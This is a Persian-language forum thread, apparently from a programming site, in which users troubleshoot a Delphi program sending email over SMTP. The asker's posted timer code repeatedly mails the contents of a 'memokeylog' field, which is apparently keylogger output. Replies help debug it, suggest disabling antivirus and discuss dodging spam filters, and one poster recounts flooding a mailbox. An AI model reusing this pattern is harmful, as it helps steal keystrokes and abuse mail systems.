البته برنامه ی آقای goudarzivahid با اون Smtp که گذاشته بودند جواب نداد
Printable View
البته برنامه ی آقای goudarzivahid با اون Smtp که گذاشته بودند جواب نداد
من از smtp هاستی که خریدم استفاده میکنم اما چیزی ارسال نمیشه . آیا باید از هاست دیگه ای استفاده کنم؟
بعضی وقتها هم این صفحه از طرف آنتی ویروس نمایان می گردد
معمولا وقتی از این جور برنامه ها استفاده میشه آنتی ویروسها ویا دیوارای آتش پیغام مبنی بر اینکه برنامه می خواد به فلانجا وصل بشه می دهند که در بیشتر اوقات چیز عادی هست
خوب اما این یک پیام خطاست و پیامی ارسال نمی شه
نقل قول:
خوب اما این یک پیام خطاست و پیامی ارسال نمی شه
مطمئن نیستم ولی احتمال می دم دیوارآتش و ضدویروس داره جلو پیغام فرستادن را می گیرهنقل قول:
سلام
پیشنهاد میکنم دستور زیر را تو runاجرا کنی
telnet mail.nigc.ir 25
اگه بدون خطا برنامه telnet باز شد که معلوم میشه 1 جای برنامه delphi میلنگه اگه با خطا مواجه شدی به طور حتم potr 25 کامپیوتر شما بسته (اگه دیوارآتش و ضدویروس فضول داشته باشی امکانش زیاده) و برای همینه که برنامه کار نمیده
اخه این جوری نیست که همیشه این پیام رو بده و بعضی وقتها میل ارسال می شه
ضمنا من از یک تایمر استفاده کرده ام که باید هر چند دقیقه میلی را ارسال کند.اما پس مدتی به نظر می رسه که کل برنامه غیر فغال می شه و تابع فرستادن میل اجرا نمی گردد.
دوست عزیز آقای خطیبی مشکل در اینجاست که isp ها پورت 25 را می بندند.
البته اگه isp شما معتبر باشه برای اینکه محبوبیت خودشو از دست نده این کارو نمیکنه در ضمن شما بادستور زیر مطمئن شدید که port 25 باز است.نقل قول:
دوست عزیز آقای خطیبی مشکل در اینجاست که isp ها پورت 25 را می بندند.
telnet mail.nigc.ir 25
اگه می خواین مطمن بشید آنتی ویروس خودتونو unistal کنید بعد یه ریست کنید و دوباره میل بفرستید به احتمال 99 درصد با مشکل مواجه نمی شید. البته اگه برنامه رو درست نوشته باشید.نقل قول:
اخه این جوری نیست که همیشه این پیام رو بده و بعضی وقتها میل ارسال می شه
موفق باشید
من آنتی ویروس را غیر فعال کرده ام اما گهگاه مشکل دارم
ضمنا مقعی که اینترنت قطع است TRY EXCEPT برنامه عمل نکرده وخطای Time Out بر روی صفحه ظاهر می گردد علت را می دانید؟
نه متاسفانه دقیقا نمیدانم
احتمال زیاد 1 جای برنامه هم ایراد داره
آخه چه اشکالی در این چند خط برنامه ممکن است وجود داشته باشه
دوستان عزیز منتظریم
جناب خطیبی اگه لطف کنید سورس این برنامتونو که timer داره بزارین تا دوستان ببینند و بررسی کنند شاید مشکل زودتر حل شه
موفق باشید
این سورس برنامه است(فقط رویداد Timer(
procedure TForm1.Timer1Timer(Sender: TObject);
var
a:boolean;
begin
Application.ProcessMessages;
// application.MainForm.Show;
if trim(form1.memokeylog.Text)<>'' then begin
a:=SendMail;
showmessage('send');
if a then begin
form1.memokeylog.Clear;
if fileexists('Error') then
deletefile('error');
end;
end;
end;
مطمئن نیستم باید سورس را کامل دید ولی ظاهرا رویداد Timer اشتباه نوشته شده.
فکر کنم سورس واضح باشه
من از دو تابع دیگه استفاده کردم که یکیش همین تابع SendMail است و به تنهایی جواب می ده
نقل قول:
همین تابع SendMail است و به تنهایی جواب می ده
if trim(form1.memokeylog.Text)<>'' then begin
a:=SendMail;
showmessage('send');
if a then begin
form1.memokeylog.Clear;
if fileexists('Error') then
deletefile('error');
end;
end;
آیا در جائی از برنامتون مقدار a به False تغییر می کنه یا اینکه وقتی True شد تا آخر True میمونه و دیگه به else بر نمیخوره که False بشه ؟؟؟
حتی پیام Send مشاهده می گردد
بله ولی وقتی با مشکل مواجه میشه Error میده ولی اگر در همین لحظه مقدار a به False تغییر داده نشود در دور بعدی timer پیغام خطا که شاید هم درست نباشدمشاهده می شود.نقل قول:
حتی پیام Send مشاهده می گردد
مگه در این برنامه نمی شه؟
ضمنا می شه بگید چی کار کنم که میلها به Bulk نره؟
خوب باید یه SMTP درجه یک با کارائی عالی را در اختیار داشته باشید
http://www.barnamenevis.org/sh...ad.php?t=13715
نقل قول:
چطور yahoo میفهمه که یک میل رو باید به bulk بفرسته؟
البته غیر از حالتی که مثلا sender اون چندین با ایمیل بفرسته !
من بعد از انجام تستهای زیاد (واقعا زیاد) متوجه شدم که مسئله bluk بیشتر از همه به سرور ارسال کننده ایمیل بستگی داره تا به سرور گیرنده.برای نمونه من با همون برنامه ای که گذشتم با استفاده از سرور mail.nigc.ir (که البته مثل بقیه سرورها برای استفاده از اون باید یک حساب توش داشته باشی ) حدود 4 هزار میل که هر کدوم حدود 3 مگا بایت حجم داشت به یک صندوق یاهو فرستادم و جالب اینکه در اون صندوف تموم میل های ارسالی در inbox بود و 100% فضای یک گیگایی یاهو پر شده بود......ولی
با ارسال حتی یک میل از سرور yahoo به خود اون همون 1 mail به bluk میره.
پس می توان نتیجه گرفت که ارسال تعداد زیاد نامه پشت سر هم نمی تواند دلیلی بر bluk شدن نامه ها باشه و سندی که اکثرا اون را دیدن و این نکته را بهتر ثابت میکنه ارسال میل های پیاپی سایتهای کسب درآمد به inbox می باشد وگهگاه بعضی از اونها به bluk راهنمایی میشه که اونم به دلیل کثرت میل ها نیست....
خوب باید یه SMTP درجه یک با کارائی عالی را در اختیار داشته باشید
http://www.barnamenevis.org/sh...ad.php?t=13715
نقل قول:
نقل قول:
چطور yahoo میفهمه که یک میل رو باید به bulk بفرسته؟
البته غیر از حالتی که مثلا sender اون چندین با ایمیل بفرسته !
من بعد از انجام تستهای زیاد (واقعا زیاد) متوجه شدم که مسئله bluk بیشتر از همه به سرور ارسال کننده ایمیل بستگی داره تا به سرور گیرنده.برای نمونه من با همون برنامه ای که گذشتم با استفاده از سرور mail.nigc.ir (که البته مثل بقیه سرورها برای استفاده از اون باید یک حساب توش داشته باشی ) حدود 4 هزار میل که هر کدوم حدود 3 مگا بایت حجم داشت به یک صندوق یاهو فرستادم و جالب اینکه در اون صندوف تموم میل های ارسالی در inbox بود و 100% فضای یک گیگایی یاهو پر شده بود......ولی
با ارسال حتی یک میل از سرور yahoo به خود اون همون 1 mail به bluk میره.
پس می توان نتیجه گرفت که ارسال تعداد زیاد نامه پشت سر هم نمی تواند دلیلی بر bluk شدن نامه ها باشه و سندی که اکثرا اون را دیدن و این نکته را بهتر ثابت میکنه ارسال میل های پیاپی سایتهای کسب درآمد به inbox می باشد وگهگاه بعضی از اونها به bluk راهنمایی میشه که اونم به دلیل کثرت میل ها نیست....
به بیان ساده تر با yahoo نمی شه وحتما به Bulk میره
درسته؟؟؟!!!
سلام
من نوشته های شما را خواندم.
من قبلا با تغییرات در smtp virtual در IIS این کار را کرده بودم و دنبال کدی مس گشتم که ایمیل را از برنامه خودم بفرستم ولی با indysmtpserver نیز مشکل دارم.
ایمیل به سرور وارد میشود ولی از آنجا خارج نمیشود و به آدرس مقصد ارسال نمیشود.
پروتوکل smtp را هم خواندم و commandhandlers ها را هم ساختم ولی نشد.
اگر لطف کنید راه ارسال ایمیل از لوکال هاست بدون IIS و از برنامه را بگوئید ممنون میشوم.
با تشکر نجفی
سلامنقل قول:
نوشته شده توسط ghabil
من نوشته های شما را خواندم.
من قبلا با تغییرات در smtp virtual در IIS این کار را کرده بودم و دنبال کدی مس گشتم که ایمیل را از برنامه خودم بفرستم ولی با indysmtpserver نیز مشکل دارم.
ایمیل به سرور وارد میشود ولی از آنجا خارج نمیشود و به آدرس مقصد ارسال نمیشود.
پروتوکل smtp را هم خواندم و commandhandlers ها را هم ساختم ولی نشد.
اگر لطف کنید راه ارسال ایمیل از لوکال هاست بدون IIS و از برنامه را بگوئید ممنون میشوم.
با تشکر نجفی
حداقل با میل سرور مجانی یاهو این کار غیر ممکن هست